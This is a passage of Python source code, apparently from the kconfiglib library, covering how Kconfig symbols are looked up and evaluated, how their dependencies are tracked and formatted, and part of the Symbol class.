stmt.orig_prompts.append(new_prompt)
# Only symbols can select
if isinstance(stmt, Symbol):
stmt.orig_selects.extend(new_selects)
# Save dependencies from enclosing menus and if's
stmt.deps_from_containing = deps
# The set of symbols referenced directly by the symbol/choice plus
# all symbols referenced by enclosing menus and if's.
stmt.all_referenced_syms = \
stmt.referenced_syms | _get_expr_syms(deps)
# Propagate dependencies from enclosing menus and if's
stmt.def_exprs.extend([(val_expr, _make_and(cond_expr, deps))
for (val_expr, cond_expr) in new_def_exprs])
for (target, cond) in new_selects:
target.rev_dep = _make_or(target.rev_dep,
_make_and(stmt,
_make_and(cond, deps)))
if new_prompt is not None:
prompt, cond_expr = new_prompt
stmt.prompts.append((prompt, _make_and(cond_expr, deps)))
#
# Symbol table manipulation
#
def _sym_lookup(self, name, add_sym_if_not_exists = True):
"""Fetches the symbol 'name' from the symbol table, optionally adding
it if it does not exist (this is usually what we want)."""
if name in self.syms:
return self.syms[name]
new_sym = Symbol()
new_sym.config = self
new_sym.name = name
if add_sym_if_not_exists:
self.syms[name] = new_sym
else:
# This warning is generated while evaluating an expression
# containing undefined symbols using Config.eval()
self._warn("no symbol {0} in configuration".format(name))
return new_sym
#
# Evaluation of symbols and expressions
#
def _eval_expr(self, expr):
"""Evaluates an expression and returns one of the tristate values "n",
"m" or "y"."""
res = self._eval_expr_2(expr)
# Promote "m" to "y" if we're running without modules. Internally, "m"
# is often rewritten to "m" && MODULES by both the C implementation and
# kconfiglib, which takes care of cases where "m" should be false if
# we're running without modules.
if res == "m" and not self._has_modules():
return "y"
return res
def _eval_expr_2(self, expr):
if expr is None:
return "y"
if isinstance(expr, Symbol):
# Non-bool/tristate symbols are always "n" in a tristate sense,
# regardless of their value
if expr.type != BOOL and expr.type != TRISTATE:
return "n"
return expr.get_value()
if isinstance(expr, str):
return expr if (expr == "y" or expr == "m") else "n"
first_expr = expr[0]
if first_expr == OR:
res = "n"
for subexpr in expr[1]:
ev = self._eval_expr_2(subexpr)
# Return immediately upon discovering a "y" term
if ev == "y":
return "y"
if ev == "m":
res = "m"
# 'res' is either "n" or "m" here; we already handled the
# short-circuiting "y" case in the loop.
return res
if first_expr == AND:
res = "y"
for subexpr in expr[1]:
ev = self._eval_expr_2(subexpr)
# Return immediately upon discovering an "n" term
if ev == "n":
return "n"
if ev == "m":
res = "m"
# 'res' is either "m" or "y" here; we already handled the
# short-circuiting "n" case in the loop.
return res
if first_expr == NOT:
ev = self._eval_expr_2(expr[1])
if ev == "y":
return "n"
return "y" if (ev == "n") else "m"
if first_expr == EQUAL:
return "y" if (self._get_str_value(expr[1]) ==
self._get_str_value(expr[2])) else "n"
if first_expr == UNEQUAL:
return "y" if (self._get_str_value(expr[1]) !=
self._get_str_value(expr[2])) else "n"
_internal_error("Internal error while evaluating expression: "
"unknown operation {0}.".format(first_expr))
def _get_str_value(self, obj):
if isinstance(obj, str):
return obj
# obj is a Symbol
return obj.get_value()
def _eval_min(self, e1, e2):
e1_eval = self._eval_expr(e1)
e2_eval = self._eval_expr(e2)
return e1_eval if tri_less(e1_eval, e2_eval) else e2_eval
def _eval_max(self, e1, e2):
e1_eval = self._eval_expr(e1)
e2_eval = self._eval_expr(e2)
return e1_eval if tri_greater(e1_eval, e2_eval) else e2_eval
#
# Methods related to the MODULES symbol
#
def _has_modules(self):
modules_sym = self.syms.get("MODULES")
return (modules_sym is not None) and (modules_sym.get_value() == "y")
#
# Dependency tracking
#
def _build_dep(self):
"""Populates the Symbol.dep sets, linking the symbol to the symbols
that immediately depend on it in the sense that changing the value of
the symbol might affect the values of those other symbols. This is used
for caching/invalidation purposes. The calculated sets might be larger
than necessary as we don't do any complicated analysis of the
expressions."""
for sym in self.syms.itervalues():
sym.dep = set()
# Adds 'sym' as a directly dependent symbol to all symbols that appear
# in the expression 'e'
def add_expr_deps(e, sym):
for s in _get_expr_syms(e):
s.dep.add(sym)
# The directly dependent symbols of a symbol are:
# - Any symbols whose prompts, default values, rev_dep (select
# condition), or ranges depend on the symbol
# - Any symbols that belong to the same choice statement as the symbol
# (these won't be included in 'dep' as that makes the dependency
# graph unwieldy, but Symbol._get_dependent() will include them)
# - Any symbols in a choice statement that depends on the symbol
for sym in self.syms.itervalues():
for (_, e) in sym.prompts:
add_expr_deps(e, sym)
for (v, e) in sym.def_exprs:
add_expr_deps(v, sym)
add_expr_deps(e, sym)
add_expr_deps(sym.rev_dep, sym)
for (l, u, e) in sym.ranges:
add_expr_deps(l, sym)
add_expr_deps(u, sym)
add_expr_deps(e, sym)
if sym.is_choice_symbol_:
choice = sym.parent
for (_, e) in choice.prompts:
add_expr_deps(e, sym)
for (_, e) in choice.def_exprs:
add_expr_deps(e, sym)
def _expr_val_str(self, expr, no_value_str = "(none)", get_val_instead_of_eval = False):
# Since values are valid expressions, _expr_to_str() will get a nice
# string representation for those as well.
if expr is None:
return no_value_str
if get_val_instead_of_eval:
if isinstance(expr, str):
return _expr_to_str(expr)
val = expr.get_value()
else:
val = self._eval_expr(expr)
return "{0} (value: {1})".format(_expr_to_str(expr), _expr_to_str(val))
def _expand_sym_refs(self, s):
"""Expands $-references to symbols in 's' to symbol values, or to the
empty string for undefined symbols."""
while 1:
sym_ref_re_match = sym_ref_re.search(s)
if sym_ref_re_match is None:
return s
sym_name = sym_ref_re_match.group(0)[1:]
sym = self.syms.get(sym_name)
expansion = "" if sym is None else sym.get_value()
s = s[:sym_ref_re_match.start()] + \
expansion + \
s[sym_ref_re_match.end():]
def _get_sym_or_choice_str(self, sc):
"""Symbols and choices have many properties in common, so we factor out
common __str__() stuff here. "sc" is short for "symbol or choice"."""
# As we deal a lot with string representations here, use some
# convenient shorthand:
s = _expr_to_str
#
# Common symbol/choice properties
#
user_value_str = "(no user value)" if sc.user_val is None else s(sc.user_val)
visibility_str = s(sc.get_visibility())
# Build prompts string
if sc.prompts == []:
prompts_str = " (no prompts)"
else:
prompts_str_rows = []
for (prompt, cond_expr) in sc.orig_prompts:
if cond_expr is None:
prompts_str_rows.append(' "{0}"'.format(prompt))
else:
prompts_str_rows.append(' "{0}" if '.format(prompt) +
self._expr_val_str(cond_expr))
prompts_str = "\n".join(prompts_str_rows)
# Build locations string
if sc.def_locations == []:
locations_str = "(no locations)"
else:
locations_str = " ".join(["{0}:{1}".format(filename, linenr) for
(filename, linenr) in sc.def_locations])
# Build additional-dependencies-from-menus-and-if's string
additional_deps_str = " " + self._expr_val_str(sc.deps_from_containing,
"(no additional dependencies)")
#
# Symbol-specific stuff
#
if isinstance(sc, Symbol):
# Build value string
value_str = s(sc.get_value())
# Build ranges string
if isinstance(sc, Symbol):
if sc.ranges == []:
ranges_str = " (no ranges)"
else:
ranges_str_rows = []
for (l, u, cond_expr) in sc.ranges:
if cond_expr is None:
ranges_str_rows.append(" [{0}, {1}]".format(s(l), s(u)))
else:
ranges_str_rows.append(" [{0}, {1}] if {2}"
.format(s(l), s(u), self._expr_val_str(cond_expr)))
ranges_str = "\n".join(ranges_str_rows)
# Build default values string
if sc.def_exprs == []:
defaults_str = " (no default values)"
else:
defaults_str_rows = []
for (val_expr, cond_expr) in sc.orig_def_exprs:
row_str = " " + self._expr_val_str(val_expr, "(none)", sc.type == STRING)
defaults_str_rows.append(row_str)
defaults_str_rows.append(" Condition: " + self._expr_val_str(cond_expr))
defaults_str = "\n".join(defaults_str_rows)
# Build selects string
if sc.orig_selects == []:
selects_str = " (no selects)"
else:
selects_str_rows = []
for (target, cond_expr) in sc.orig_selects:
if cond_expr is None:
selects_str_rows.append(" {0}".format(target.name))
else:
selects_str_rows.append(" {0} if ".format(target.name) +
self._expr_val_str(cond_expr))
selects_str = "\n".join(selects_str_rows)
# Build reverse dependencies string
if sc.rev_dep == "n":
rev_dep_str = " (no reverse dependencies)"
else:
rev_dep_str = " " + self._expr_val_str(sc.rev_dep)
res = _sep_lines("Symbol " + (sc.name if sc.name is not None else "(no name)"),
"Type : " + typename[sc.type],
"Value : " + value_str,
"User value : " + user_value_str,
"Visibility : " + visibility_str,
"Is choice item : " + bool_str[sc.is_choice_symbol_],
"Is defined : " + bool_str[sc.is_defined_],
"Is from env. : " + bool_str[sc.is_from_env],
"Is special : " + bool_str[sc.is_special_] + "\n")
if sc.ranges != []:
res += _sep_lines("Ranges:",
ranges_str + "\n")
res += _sep_lines("Prompts:",
prompts_str,
"Default values:",
defaults_str,
"Selects:",
selects_str,
"Reverse dependencies:",
rev_dep_str,
"Additional dependencies from enclosing menus and if's:",
additional_deps_str,
"Locations: " + locations_str)
return res
#
# Choice-specific stuff
#
# Build name string (for named choices)
if sc.name is None:
name_str = "(no name)"
else:
name_str = sc.name
# Build selected symbol string
sel = sc.get_selection()
if sel is None:
sel_str = "(no selection)"
else:
sel_str = sel.name
# Build mode string
mode_str = s(sc.get_mode())
# Build default values string
if sc.def_exprs == []:
defaults_str = " (no default values)"
else:
defaults_str_rows = []
for (sym, cond_expr) in sc.orig_def_exprs:
if cond_expr is None:
defaults_str_rows.append(" {0}".format(sym.name))
else:
defaults_str_rows.append(" {0} if ".format(sym.name) +
self._expr_val_str(cond_expr))
defaults_str = "\n".join(defaults_str_rows)
# Build contained symbols string
names = [sym.name for sym in sc.get_symbols()]
if names == []:
syms_string = "(empty)"
else:
syms_string = " ".join(names)
return _sep_lines("Choice",
"Name (for named choices): " + name_str,
"Type : " + typename[sc.type],
"Selected symbol : " + sel_str,
"User value : " + user_value_str,
"Mode : " + mode_str,
"Visibility : " + visibility_str,
"Optional : " + bool_str[sc.optional],
"Prompts:",
prompts_str,
"Defaults:",
defaults_str,
"Choice symbols:",
" " + syms_string,
"Additional dependencies from enclosing menus and if's:",
additional_deps_str,
"Locations: " + locations_str)
def _expr_depends_on(self, expr, sym):
"""Reimplementation of expr_depends_symbol() from mconf.c. Used to
determine if a submenu should be implicitly created, which influences what
items inside choice statements are considered choice items."""
if expr is None:
return False
def rec(expr):
if isinstance(expr, str):
return False
if isinstance(expr, Symbol):
return expr is sym
e0 = expr[0]
if e0 == EQUAL or e0 == UNEQUAL:
return self._eq_to_sym(expr) is sym
if e0 == AND:
for and_expr in expr[1]:
if rec(and_expr):
return True
return False
return rec(expr)
def _eq_to_sym(self, eq):
"""_expr_depends_on() helper. For (in)equalities of the form sym = y/m
or sym != n, returns sym. For other (in)equalities, returns None."""
relation, left, right = eq
left = self._transform_n_m_y(left)
right = self._transform_n_m_y(right)
# Make sure the symbol (if any) appears to the left
if not isinstance(left, Symbol):
left, right = right, left
if not isinstance(left, Symbol):
return None
if (relation == EQUAL and (right == "m" or right == "y")) or \
(relation == UNEQUAL and right == "n"):
return left
return None
def _transform_n_m_y(self, item):
"""_eq_to_sym() helper. Translates the symbols n, m, and y to their
string equivalents."""
if item is self.n:
return "n"
if item is self.m:
return "m"
if item is self.y:
return "y"
return item
def _warn(self, msg, filename = None, linenr = None):
"""For printing warnings to stderr."""
if self.print_warnings:
self._warn_or_undef_assign(msg, WARNING, filename, linenr)
def _undef_assign(self, msg, filename = None, linenr = None):
"""For printing informational messages related to assignments
to undefined variables to stderr."""
if self.print_undef_assign:
self._warn_or_undef_assign(msg, UNDEF_ASSIGN, filename, linenr)
def _warn_or_undef_assign(self, msg, msg_type, filename, linenr):
if filename is not None:
sys.stderr.write("{0}:".format(_clean_up_path(filename)))
if linenr is not None:
sys.stderr.write("{0}:".format(linenr))
if msg_type == WARNING:
sys.stderr.write("warning: ")
elif msg_type == UNDEF_ASSIGN:
sys.stderr.write("info: ")
else:
_internal_error('Internal error while printing warning: unknown warning type "{0}".'
.format(msg_type))
sys.stderr.write(msg + "\n")
def _get_expr_syms(expr):
"""Returns the set() of symbols appearing in expr."""
res = set()
if expr is None:
return res
def rec(expr):
if isinstance(expr, Symbol):
res.add(expr)
return
if isinstance(expr, str):
return
e0 = expr[0]
if e0 == OR or e0 == AND:
for term in expr[1]:
rec(term)
elif e0 == NOT:
rec(expr[1])
elif e0 == EQUAL or e0 == UNEQUAL:
_, v1, v2 = expr
if isinstance(v1, Symbol):
res.add(v1)
if isinstance(v2, Symbol):
res.add(v2)
else:
_internal_error("Internal error while fetching symbols from an "
"expression with token stream {0}.".format(expr))
rec(expr)
return res
#
# Construction of expressions
#
# These functions as well as the _eval_min/max() functions above equate
# None with "y", which is usually what we want, but needs to be kept in
# mind.
def _make_or(e1, e2):
# Perform trivial simplification and avoid None's (which
# correspond to y's)
if e1 is None or e2 is None or \
e1 == "y" or e2 == "y":
return "y"
if e1 == "n":
return e2
if e2 == "n":
return e1
# Prefer to merge/update argument list if possible instead of creating
# a new OR node
if isinstance(e1, tuple) and e1[0] == OR:
if isinstance(e2, tuple) and e2[0] == OR:
return (OR, e1[1] + e2[1])
return (OR, e1[1] + [e2])
if isinstance(e2, tuple) and e2[0] == OR:
return (OR, e2[1] + [e1])
return (OR, [e1, e2])
# Note: returns None if e1 == e2 == None
def _make_and(e1, e2):
if e1 == "n" or e2 == "n":
return "n"
if e1 is None or e1 == "y":
return e2
if e2 is None or e2 == "y":
return e1
# Prefer to merge/update argument list if possible instead of creating
# a new AND node
if isinstance(e1, tuple) and e1[0] == AND:
if isinstance(e2, tuple) and e2[0] == AND:
return (AND, e1[1] + e2[1])
return (AND, e1[1] + [e2])
if isinstance(e2, tuple) and e2[0] == AND:
return (AND, e2[1] + [e1])
return (AND, [e1, e2])
#
# Constants and functions related to types, parsing, evaluation and printing,
# put globally to unclutter the Config class a bit.
#
# Tokens
(T_OR, T_AND, T_NOT,
T_OPEN_PAREN, T_CLOSE_PAREN,
T_EQUAL, T_UNEQUAL,
T_MAINMENU, T_MENU, T_ENDMENU,
T_SOURCE, T_CHOICE, T_ENDCHOICE,
T_COMMENT, T_CONFIG, T_MENUCONFIG,
T_HELP, T_IF, T_ENDIF, T_DEPENDS, T_ON,
T_OPTIONAL, T_PROMPT, T_DEFAULT,
T_BOOL, T_TRISTATE, T_HEX, T_INT, T_STRING,
T_DEF_BOOL, T_DEF_TRISTATE,
T_SELECT, T_RANGE, T_OPTION, T_ENV,
T_DEFCONFIG_LIST, T_MODULES, T_VISIBLE) = range(0, 38)
# Keyword to token map
keywords = {
"mainmenu" : T_MAINMENU,
"menu" : T_MENU,
"endmenu" : T_ENDMENU,
"endif" : T_ENDIF,
"endchoice" : T_ENDCHOICE,
"source" : T_SOURCE,
"choice" : T_CHOICE,
"config" : T_CONFIG,
"comment" : T_COMMENT,
"menuconfig" : T_MENUCONFIG,
"help" : T_HELP,
"if" : T_IF,
"depends" : T_DEPENDS,
"on" : T_ON,
"optional" : T_OPTIONAL,
"prompt" : T_PROMPT,
"default" : T_DEFAULT,
"bool" : T_BOOL,
"boolean" : T_BOOL,
"tristate" : T_TRISTATE,
"int" : T_INT,
"hex" : T_HEX,
"def_bool" : T_DEF_BOOL,
"def_tristate" : T_DEF_TRISTATE,
"string" : T_STRING,
"select" : T_SELECT,
"range" : T_RANGE,
"option" : T_OPTION,
"env" : T_ENV,
"defconfig_list" : T_DEFCONFIG_LIST,
"modules" : T_MODULES,
"visible" : T_VISIBLE }
# Strings to use for True and False
bool_str = { False : "false", True : "true" }
# Tokens after which identifier-like lexemes are treated as strings. T_CHOICE
# is included to avoid symbols being registered for named choices.
string_lex = frozenset((T_BOOL, T_TRISTATE, T_INT, T_HEX, T_STRING, T_CHOICE,
T_PROMPT, T_MENU, T_COMMENT, T_SOURCE, T_MAINMENU))
# Matches the initial token on a line; see _tokenize().
initial_token_re = re.compile(r"[^\w]*(\w+)")
# Matches an identifier/keyword optionally preceded by whitespace
id_keyword_re = re.compile(r"\s*([\w./-]+)")
# Regular expressions for parsing .config files
set_re = re.compile(r"CONFIG_(\w+)=(.*)")
unset_re = re.compile(r"# CONFIG_(\w+) is not set")
# Regular expression for finding $-references to symbols in strings
sym_ref_re = re.compile(r"\$[A-Za-z_][0-9A-Za-z_]*")
# Integers representing symbol types
UNKNOWN, BOOL, TRISTATE, STRING, HEX, INT = range(0, 6)
# Strings to use for types
typename = {
UNKNOWN : "unknown",
BOOL : "bool",
TRISTATE : "tristate",
STRING : "string",
HEX : "hex",
INT : "int" }
# Token to type mapping
token_to_type = { T_BOOL : BOOL,
T_TRISTATE : TRISTATE,
T_STRING : STRING,
T_INT : INT,
T_HEX : HEX }
# Default values for symbols of different types (the value the symbol gets if
# it is not assigned a user value and none of its 'default' clauses kick in)
default_value = { BOOL : "n",
TRISTATE : "n",
STRING : "",
INT : "",
HEX : "" }
# Indicates that no item is selected in a choice statement
NO_SELECTION = 0
# Integers representing expression types
OR, AND, NOT, EQUAL, UNEQUAL = range(0, 5)
# Map from tristate values to integers
tri_to_int = { "n" : 0, "m" : 1, "y" : 2 }
# Printing-related stuff
op_to_str = { AND : " && ",
OR : " || ",
EQUAL : " = ",
UNEQUAL : " != " }
precedence = { OR : 0, AND : 1, NOT : 2 }
# Types of informational messages
WARNING = 0
UNDEF_ASSIGN = 1
def _intersperse(lst, op):
"""_expr_to_str() helper. Gets the string representation of each expression in lst
and produces a list where op has been inserted between the elements."""
if lst == []:
return ""
res = []
def handle_sub_expr(expr):
no_parens = isinstance(expr, (str, Symbol)) or \
expr[0] in (EQUAL, UNEQUAL) or \
precedence[op] <= precedence[expr[0]]
if not no_parens:
res.append("(")
res.extend(_expr_to_str_rec(expr))
if not no_parens:
res.append(")")
op_str = op_to_str[op]
handle_sub_expr(lst[0])
for expr in lst[1:]:
res.append(op_str)
handle_sub_expr(expr)
return res
def _expr_to_str(expr):
s = "".join(_expr_to_str_rec(expr))
return s
def _sym_str_string(sym_or_str):
if isinstance(sym_or_str, str):
return '"{0}"'.format(sym_or_str)
return sym_or_str.name
def _expr_to_str_rec(expr):
if expr is None:
return [""]
if isinstance(expr, (Symbol, str)):
return [_sym_str_string(expr)]
e0 = expr[0]
if e0 == OR or e0 == AND:
return _intersperse(expr[1], expr[0])
if e0 == NOT:
need_parens = not isinstance(expr[1], (str, Symbol))
res = ["!"]
if need_parens:
res.append("(")
res.extend(_expr_to_str_rec(expr[1]))
if need_parens:
res.append(")")
return res
if e0 == EQUAL or e0 == UNEQUAL:
return [_sym_str_string(expr[1]),
op_to_str[expr[0]],
_sym_str_string(expr[2])]
class _Block:
"""Represents a list of items (symbols, menus, choice statements and
comments) appearing at the top-level of a file or witin a menu, choice or
if statement."""
def __init__(self):
self.items = []
def get_items(self):
return self.items
def add_item(self, item):
self.items.append(item)
def _make_conf(self):
# Collect the substrings in a list and later use join() instead of +=
# to build the final .config contents. With older Python versions, this
# yields linear instead of quadratic complexity.
strings = []
for item in self.items:
strings.extend(item._make_conf())
return strings
def add_depend_expr(self, expr):
for item in self.items:
item.add_depend_expr(expr)
class Item():
"""Base class for symbols and other Kconfig constructs. Subclasses are
Symbol, Choice, Menu, and Comment."""
def is_symbol(self):
"""Returns True if the item is a symbol, otherwise False. Short for
isinstance(item, kconfiglib.Symbol)."""
return isinstance(self, Symbol)
def is_choice(self):
"""Returns True if the item is a choice, otherwise False. Short for
isinstance(item, kconfiglib.Choice)."""
return isinstance(self, Choice)
def is_menu(self):
"""Returns True if the item is a menu, otherwise False. Short for
isinstance(item, kconfiglib.Menu)."""
return isinstance(self, Menu)
def is_comment(self):
"""Returns True if the item is a comment, otherwise False. Short for
isinstance(item, kconfiglib.Comment)."""
return isinstance(self, Comment)
class _HasVisibility():
"""Base class for elements that have a "visibility" that acts as an upper
limit on the values a user can set for them. Subclasses are Symbol and
Choice (which supply some of the attributes)."""
def __init__(self):
self.cached_visibility = None
self.prompts = []
def _invalidate(self):
self.cached_visibility = None
def _get_visibility(self):
if self.cached_visibility is None:
vis = "n"
for (prompt, cond_expr) in self.prompts:
vis = self.config._eval_max(vis, cond_expr)
if isinstance(self, Symbol) and self.is_choice_symbol_:
vis = self.config._eval_min(vis, self.parent._get_visibility())
# Promote "m" to "y" if we're dealing with a non-tristate
if vis == "m" and self.type != TRISTATE:
vis = "y"
self.cached_visibility = vis
return self.cached_visibility
class Symbol(Item, _HasVisibility):
"""Represents a configuration symbol - e.g. FOO for
config FOO
..."""
#
# Public interface
#
def get_value(self):
"""Calculate and return the value of the symbol. See also
Symbol.set_user_value()."""
if self.cached_value is not None:
return self.cached_value
self.write_to_conf = False
# As a quirk of Kconfig, undefined symbols get their name as their
# value. This is why things like "FOO = bar" work for seeing if FOO has
# the value "bar".
if self.type == UNKNOWN:
self.cached_value = self.name
return self.name
new_val = default_value[self.type]
vis = self._get_visibility()
if self.type == BOOL or self.type == TRISTATE:
# The visibility and mode (modules-only or single-selection) of
# choice items will be taken into account in self._get_visibility()
if self.is_choice_symbol_:
if vis != "n":
choice = self.parent
mode = choice.get_mode()
self.write_to_conf = (mode != "n")
if mode == "y":
new_val = "y" if (choice.get_selection() is self) else "n"
elif mode == "m":
if self.user_val == "m" or self.user_val == "y":
new_val = "m"
else:
use_defaults = True
if vis != "n":
# If the symbol is visible and has a user value, use that.
# Otherwise, look at defaults.
self.write_to_conf = True
if self.user_val is not None:
new_val = self.config._eval_min(self.user_val, vis)
use_defaults = False
if use_defaults:
for (val_expr, cond_expr) in self.def_exprs:
cond_eval = self.config._eval_expr(cond_expr)
if cond_eval != "n":
self.write_to_conf = True
new_val = self.config._eval_min(val_expr, cond_eval)
break
# Reverse dependencies take precedence
rev_dep_val = self.config._eval_expr(self.rev_dep)
if rev_dep_val != "n":
self.write_to_conf = True
new_val = self.config._eval_max(new_val, rev_dep_val)
# Promote "m" to "y" for booleans
if new_val == "m" and self.type == BOOL:
new_val = "y"
elif self.type == STRING:
use_defaults = True
if vis != "n":
self.write_to_conf = True
if self.user_val is not None:
new_val = self.user_val
use_defaults = False
if use_defaults:
for (val_expr, cond_expr) in self.def_exprs:
if self.config._eval_expr(cond_expr) != "n":
self.write_to_conf = True
new_val = self.config._get_str_value(val_expr)
break
elif self.type == HEX or self.type == INT:
has_active_range = False
low = None
high = None
use_defaults = True
base = 16 if self.type == HEX else 10
for(l, h, cond_expr) in self.ranges:
if self.config._eval_expr(cond_expr) != "n":
has_active_range = True
low_str = self.config._get_str_value(l)
high_str = self.config._get_str_value(h)
low = int(low_str, base) if \
_is_base_n(low_str, base) else 0
high = int(high_str, base) if \
_is_base_n(high_str, base) else 0
break
if vis != "n":
self.write_to_conf = True
if self.user_val is not None and \
_is_base_n(self.user_val, base) and \
(not has_active_range or
low <= int(self.user_val, base) <= high):
# If the user value is OK, it is stored in exactly the same
# form as specified in the assignment (with or without
# "0x", etc).
use_defaults = False
new_val = self.user_val
if use_defaults:
for (val_expr, cond_expr) in self.def_exprs:
if self.config._eval_expr(cond_expr) != "n":
self.write_to_conf = True
# If the default value is OK, it is stored in exactly
# the same form as specified. Otherwise, it is clamped
# to the range, and the output has "0x" as appropriate
# for the type.
new_val = self.config._get_str_value(val_expr)
if _is_base_n(new_val, base):
new_val_num = int(new_val, base)
if has_active_range:
clamped_val = None
if new_val_num < low:
clamped_val = low
elif new_val_num > high:
clamped_val = high
if clamped_val is not None:
new_val = (hex(clamped_val) if \
self.type == HEX else str(clamped_val))
break
else: # For the for loop
# If no user value or default kicks in but the hex/int has
# an active range, then the low end of the range is used,
# provided it's > 0, with "0x" prepended as appropriate.
if has_active_range and low > 0:
new_val = (hex(low) if self.type == HEX else str(low))
self.cached_value = new_val
return new_val
def set_user_value(self, v):
"""Sets the user value of the symbol.
Equal in effect to assigning the value to the symbol within a .config
file. Use get_lower/upper_bound() or get_assignable_values() to find
the range of currently assignable values for bool and tristate symbols;
setting values outside this range will cause the user value to differ
from the result of Symbol.get_value() (be truncated). Values that are
invalid for the type (such as a_bool.set_user_value("foo")) are
ignored, and a warning is emitted if an attempt is made to assign such
a value.
For any type of symbol, is_modifiable() can be used to check if a user
value will currently have any effect on the symbol, as determined by
its visibility and range of assignable values. Any value that is valid
for the type (bool, tristate, etc.) will end up being reflected in
get_user_value() though, and might have an effect later if conditions
change. To get rid of the user value, use unset_user_value().
Any symbols dependent on the symbol are (recursively) invalidated, so
things will just work with regards to dependencies.
v -- The user value to give to the symbol."""
self._set_user_value_no_invalidate(v, False)
# There might be something more efficient you could do here, but play
# it safe.
if self.name == "MODULES":
self.config._invalidate_all()
return
self._invalidate()
self._invalidate_dependent()
def unset_user_value(self):
"""Resets the user value of the symbol, as if the symbol had never
gotten a user value via Config.load_config() or
Symbol.set_user_value()."""
self._unset_user_value_no_recursive_invalidate()
self._invalidate_dependent()
def get_user_value(self):
"""Returns the value assigned to the symbol in a .config or via
Symbol.set_user_value() (provided the value was valid for the type of the
symbol). Returns None in case of no user value."""
return self.user_val
def get_name(self):
"""Returns the name of the symbol."""
return self.name
def get_upper_bound(self):
"""For string/hex/int symbols and for bool and tristate symbols that
cannot be modified (see is_modifiable()), returns None.
Otherwise, returns the highest value the symbol can be set to with
Symbol.set_user_value() (that will not be truncated): one of "m" or "y",
arranged from lowest to highest. This corresponds to the highest value
the symbol could be given in e.g. the 'make menuconfig' interface.
See also the tri_less*() and tri_greater*() functions, which could come
in handy."""
if self.type != BOOL and self.type != TRISTATE:
return None
rev_dep = self.config._eval_expr(self.rev_dep)
# A bool selected to "m" gets promoted to "y"
if self.type == BOOL and rev_dep == "m":
rev_dep = "y"
vis = self._get_visibility()
if (tri_to_int[vis] - tri_to_int[rev_dep]) > 0:
return vis
return None
def get_lower_bound(self):
"""For string/hex/int symbols and for bool and tristate symbols that
cannot be modified (see is_modifiable()), returns None.
Otherwise, returns the lowest value the symbol can be set to with
Symbol.set_user_value() (that will not be truncated): one of "n" or "m",
arranged from lowest to highest. This corresponds to the lowest value
the symbol could be given in e.g. the 'make menuconfig' interface.
See also the tri_less*() and tri_greater*() functions, which could come
in handy."""
if self.type != BOOL and self.type != TRISTATE:
return None
rev_dep = self.config._eval_expr(self.rev_dep)
# A bool selected to "m" gets promoted to "y"
if self.type == BOOL and rev_dep == "m":
rev_dep = "y"
if (tri_to_int[self._get_visibility()] - tri_to_int[rev_dep]) > 0:
return rev_dep
return None
def get_assignable_values(self):
"""For string/hex/int symbols and for bool and tristate symbols that
cannot be modified (see is_modifiable()), returns the empty list.
Otherwise, returns a list containing the user values that can be
assigned to the symbol (that won't be truncated). Usage example:
if "m" in sym.get_assignable_values():
sym.set_user_value("m")
This is basically a more convenient interface to
get_lower/upper_bound() when wanting to test if a particular tristate
value can be assigned."""
if self.type != BOOL and self.type != TRISTATE:
return []
rev_dep = self.config._eval_expr(self.rev_dep)
# A bool selected to "m" gets promoted to "y"
if self.type == BOOL and rev_dep == "m":
rev_dep = "y"
res = ["n", "m", "y"][tri_to_int[rev_dep] :
tri_to_int[self._get_visibility()] + 1]
return res if len(res) > 1 else []
def get_type(self):
"""Returns the type of the symbol: one of UNKNOWN, BOOL, TRISTATE,
STRING, HEX, or INT. These are defined at the top level of the module,
so you'd do something like
if sym.get_type() == kconfiglib.STRING:
..."""
return self.type
def get_visibility(self):
"""Returns the visibility of the symbol: one of "n", "m" or "y". For
bool and tristate symbols, this is an upper bound on the value users
can set for the symbol. For other types of symbols, a visibility of "n"
means the user value will be ignored. A visibility of "n" corresponds
to not being visible in the 'make *config' interfaces.
Example (assuming we're running with modules enabled -- i.e., MODULES
set to 'y'):
# Assume this has been assigned 'n'
config N_SYM
tristate "N_SYM"
# Assume this has been assigned 'm'
config M_SYM
tristate "M_SYM"
# Has visibility 'n'
config A
tristate "A"
depends on N_SYM
# Has visibility 'm'
config B
tristate "B"
depends on M_SYM
# Has visibility 'y'
config C
tristate "C"
# Has no prompt, and hence visibility 'n'
config D
tristate
Having visibility be tri-valued ensures that e.g. a symbol cannot be
set to "y" by the user if it depends on a symbol with value "m", which
wouldn't be safe.
You should probably look at get_lower/upper_bound(),
get_assignable_values() and is_modifiable() before using this."""
return self._get_visibility()
def get_parent(self):
"""Returns the menu or choice statement that contains the symbol, or
None if the symbol is at the top level. Note that if statements are
treated as syntactic and do not have an explicit class
representation."""
return self.parent
def get_referenced_symbols(self, refs_from_enclosing = False):
"""Returns the set() of all symbols referenced by this symbol. For
example, the symbol defined by
config FOO
bool
prompt "foo" if A && B
default C if D
depends on E
select F if G
references the symbols A through G.
refs_from_enclosing (default: False) -- If True, the symbols
referenced by enclosing menus and if's will be
included in the result."""
return self.all_referenced_syms if refs_from_enclosing else self.referenced_syms
def get_selected_symbols(self):
"""Returns the set() of all symbols X for which this symbol has a
'select X' or 'select X if Y' (regardless of whether Y is satisfied or
not). This is a subset of the symbols returned by
get_referenced_symbols()."""
return self.selected_syms
def get_help(self):
"""Returns the help text of the symbol, or None if the symbol has no
help text."""
return self.help
def get_config(self):
"""Returns the Config instance this symbol is from."""
return self.config
def get_def_locations(self):
"""Returns a list of (filename, linenr) tuples, where filename (string)
and linenr (int) represent a location where the symbol is defined. For
the vast majority of symbols this list will only contain one element.
For the following Kconfig, FOO would get two entries: the lines marked
with *.
config FOO *
bool "foo prompt 1"
config FOO *
bool "foo prompt 2"
"""
return self.def_locations
def get_ref_locations(self):
"""Returns a list of (filename, linenr) tuples, where filename (string)
and linenr (int) represent a location where the symbol is referenced in
the configuration. For example, the lines marked by * would be included
for FOO below:
config A
bool
default BAR || FOO *
config B
tristate
depends on FOO *
default m if FOO *
if FOO *
config A
bool "A"
endif
config FOO (definition not included)
bool
"""
return self.ref_locations
def is_modifiable(self):
"""Returns True if the value of the symbol could be modified by calling
Symbol.set_user_value() and False otherwise.
For bools and tristates, this corresponds to the symbol being visible
in the 'make menuconfig' interface and not already being pinned to a
specific value (e.g. because it is selected by another symbol).
For strings and numbers, this corresponds to just being visible. (See
Symbol.get_visibility().)"""
if self.is_special_:
return False
if self.type == BOOL or self.type == TRISTATE:
rev_dep = self.config._eval_expr(self.rev_dep)
# A bool selected to "m" gets promoted to "y"
if self.type == BOOL and rev_dep == "m":
rev_dep = "y"
